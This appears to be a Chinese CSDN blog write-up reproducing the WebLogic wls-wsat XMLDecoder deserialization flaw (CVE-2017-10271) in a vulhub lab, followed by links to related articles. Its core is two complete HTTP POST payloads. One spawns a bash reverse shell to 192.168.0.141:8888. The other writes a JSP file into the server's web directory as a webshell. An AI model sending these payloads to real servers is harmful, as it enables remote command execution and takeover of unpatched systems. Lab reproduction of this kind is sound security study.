Weblogic < 10.3.6 ‘wls-wsat‘ XMLDecoder 反序列化漏洞 CVE-2017-10271 漏洞复现

最新推荐文章于 2024-09-26 16:22:40 发布
最新推荐文章于 2024-09-26 16:22:40 发布
阅读量298 收藏
点赞数
分类专栏: vulhub_Writeup 文章标签: 安全漏洞 网络安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43416469/article/details/114263948
版权

Weblogic < 10.3.6 ‘wls-wsat’ XMLDecoder 反序列化漏洞(CVE-2017-10271)

by ADummy

0x00利用路线

​ burpsuite发包—>命令执行

0x01漏洞介绍

​ Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令

影响版本
10.3.6.0
12.1.3.0.0
12.2.1.1.0
漏洞地址

/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType1

0x02漏洞复现

payload
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: your-ip:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 633

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.0.141/8888 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

在这里插入图片描述

在这里插入图片描述

写入webshell(访问:http://your-ip:7001/bea_wls_internal/test.jsp):

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: your-ip:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 638

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java><java version="1.4.0" class="java.beans.XMLDecoder">
    <object class="java.io.PrintWriter"> 
    <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
    <void method="println"><string>
    <![CDATA[
<% out.print("test"); %>
    ]]>
    </string>
    </void>
    <void method="close"/>
    </object></java></java>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

写入webshell

在这里插入图片描述

0x03参考资料

https://blog.csdn.net/yumengzth/article/details/97522783

ADummy_
关注
专栏目录
CVE-2017-10271漏洞复现Weblogic 10.3.6 ‘wls-wsatXMLDecoder 反序列化漏洞
千寻的博客
09-14 972
文章目录影响版本漏洞详情环境搭建漏洞检测漏洞复现反弹shell弹出计算器写入shell进行利用摘抄 影响版本 Oracle WebLogic Server 10.3.6.0.0版本 Oracle WebLogic Server 12.1.3.0.0版本 Oracle WebLogic Server 12.2.1.1.0版 漏洞详情 Oracle Fusion Middleware中的Oracle WebLogic Server组件的WLS Security子组件存在安全漏洞。 使用精心构造的xml数据可
Weblogic XMLDecoder 反序列化漏洞CVE-2017-10271复现)
薛定谔嘚喵博客
05-07 764
CVE-2017-10271漏洞产生的原因大致是WeblogicWLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。漏洞触发url漏洞本质:主要是由于wls组件使用了webservice来请求soap请求,所以通过构造SOAP(XML)格式的请求,在解析的过程中导致XMLDecoder反序列化漏洞,可导致执行任意命令。
Weblogic 10.3.6 ‘wls-wsatXMLDecoder 反序列化漏洞CVE-2017-10271
s1056481432的博客
08-04 410
漏洞介绍 WeblogicWLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。 漏洞环境 通过vulhub进行搭建,找到我们要复现漏洞的文件夹 docker-compose up -d 如图就搭建好了 漏洞复现 方法一: 1.直接发送如下数据包(注意其中反弹shell的语句,需要进行编码,否则解析XML的时候将出现格式错误) POST /wls-wsat/CoordinatorP
【Vulfocus】weblogic wls-wsat组件远程命令执行(CVE-2017-3506)漏洞复现
最新发布
JavaLord123的博客
09-26 683
本文详细描述了Vulfocus靶场中weblogic wls-wsat组件远程命令执行(CVE-2017-3506)复现过程
漏洞复现weblogic-10.3.6-‘wls-wsat‘-XMLDecoder反序列化(CVE-2017-10271)
过期的秋刀鱼
11-05 1066
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。WeblogicWLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。即可看到一个404页面,说明weblogic已成功启动。
CVE-2017-10271 WebLogic XMLDecoder反序列化漏洞
weixin_45694388的博客
07-09 5270
漏洞产生原因: CVE-2017-10271漏洞产生的原因大致是WeblogicWLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。 涉及版本: 10.3.6.0.0 12.1.3.0.0 12.2.1.1.0 12.2.1.2.0 环境搭建: vulhub 工具利用: 检测: 工具:weblogicScanner
Pocsuite3复现Weblogicwls-wsatXMLDecoder 反序列化漏洞(CVE-2017-10271)
jstang的博客
04-15 4087
目录 一、安装pocsuite库 二、启动漏洞环境 三、编写poc脚本(poc.py) 四、主程序调用 五、执行输出 一、安装pocsuite库 pip3 install pocsuite3==1.6.6 二、启动漏洞环境 docker run -itd --name weblogic -p 7001:7001 vulhub/weblogic:10.3.6.0-2017 三、编写poc脚本(poc.py) import re import time import base64 import soc
Weblogic 10.3.6 ‘wls-wsatXMLDecoder 反序列化漏洞CVE-2017-10271
黑白的博客
12-05 630
声明 好好学习,天天向上 漏洞描述 WeblogicWLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。 影响范围 10.3.6.0.0 12.1.3.0.0 12.2.1.1.0 12.2.1.2.0 复现过程 这里使用10.3.6.0版本 使用vulhub cd /app/vulhub-master/weblogic/CVE-2017-10271 使用docker启动 docker
Weblogic 小于10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞CVE-2017-10271
公众号shadow sock7
11-09 1706
之前本来复现过一次的,结果后来数据丢了,只好再来一遍。 没找到在linux下命令行安装的方法,于是直接在windows上安装算了。 10.3.6.0下载:https://download.oracle.com/otn/nt/middleware/11g/wls/1036/wls1036_dev.zip?AuthParam=1541742692_e16e12f2c0404fdf4d6ce52a57f...
Weblogic WLS组件REC漏洞(CVE-2017-10271)利用脚本
09-30
Weblogic wls-wsat组件反序列化漏洞(CVE-2017-10271)利用脚本。 命令执行并回显 直接上传shell 在linux下weblogic 10.3.6.0测试OK 使用方法及参数 python weblogic_wls_wsat_exp.py -t 172.16.80.131:7001 usage: weblogic_wls_wsat_exp.py [-h] -t TARGET [-c CMD] [-o OUTPUT] [-s SHELL] optional arguments: -h, --help show this help message and exit -t TARGET, --target TARGET weblogic ip and port(eg -> 172.16.80.131:7001) -c CMD, --cmd CMD command to execute,default is "id" -o OUTPUT, --output OUTPUT output file name,default is output.txt -s SHELL, --shell SHELL local jsp file name to upload,and set -o xxx.jsp
关于禁用weblogic wls-wsat组件的步骤说明
09-03
WebLogic WLS组件漏洞,文档描述如何通过禁用组件的方式来修补漏洞
Weblogic wls-wsat XMLDecoder 反序列化漏洞复现CVE-2017-10271
W小哥
06-05 799
一、漏洞描述 受影响WebLogic版本:10.3.6.0.0,12.1.3.0.0,12.2.1.1.0,12.2.1.2.0。 二、漏洞原理 WeblogicWLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。 三、环境搭建 四、漏洞复现 访问http://your-ip:7001/即可看到一个404页面,说明weblogic已成功启动。 用检查工具检测一下,发现存在漏洞 发送
Weblogic漏洞复现
m0_62392732的博客
12-21 604
Weblogic管理端未授权的两个页面存在任意上传jsp文件漏洞,进而获取服务器权限。 Oracle修复了Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service Test Page 在 ‘生产模式’ 下默认不开启,所以该漏洞有一定限制。两个页面分别为/ws_utc/begin.do、/ws_utc/config.do。 3.4.2受影响版本 weblogic 10.3.6.0 weblogic 12.1.3.0 weblogic...
复现Weblogic 10.3.6 ‘wls-wsatXMLDecoder 反序列化漏洞CVE-2017-10271
qq_54713392的博客
05-08 191
复现Weblogic < 10.3.6 'wls-wsatXMLDecoder 反序列化漏洞CVE-2017-10271漏洞原理: WeblogicWLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击机:window10 IP:192.168.32.1 靶机:ubantu16.04 IP:192.168.32.142 (1)在vulhub靶场中找vulhub/w
[Vulhub] Weblogic 10.3.6 ‘wls-wsatXMLDecoder 反序列化漏洞CVE-2017-10271
weixin_45605352的博客
05-16 499
0x00 Java反序列化漏洞 java序列化与反序列化 Java的序列化(Serialize)与反序列化(Deserialize)是对IO流的一种机制。Java序列化的目标是将对象保存到磁盘中或允许在网络中直接传输对象。序列化机制将允许实现序列化的java对象转换成不依赖平台的字节序列,这些字节序列可以保存在磁盘上,或通过网络传输。而Java的反序列化可以把字节序列恢复为Java对象,也就是说序列化将一个Java对象写入IO流中,反序列化从这个IO流中恢复这个对象,目的是使对象可以脱离Java运行环境,实
WebLogicWLS 组件漏洞CVE-2017-10271)专项检测工具
weixin_34241036的博客
01-20 573
  来源: 时间:2017-12-23 00:00:00 作者:  浏览:1929 次 近期安恒信息在应急响应过程中发现有恶意攻击者利用WebLogic漏洞对企业服务器发起大范围远程攻击,攻击成功后植入挖矿后门程序,通过分析发现攻击者利用了Oracle WebLogicWLS 组件漏洞CVE-2017-10271)。有大量企业的服务器被攻陷,且被攻击企业数量呈现明显上升趋势,需要引起高度重视...
利用POC检测WebLogic反序列化漏洞CVE-2019-2725
在2019年,Oracle WebLogic服务器遭遇了一个严重的反序列化漏洞,即CVE-2019-2725。这个漏洞允许攻击者通过精心构造的恶意请求,利用WebLogic应用程序中的序列化功能来执行任意代码,从而获取系统控制权限。由于其...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值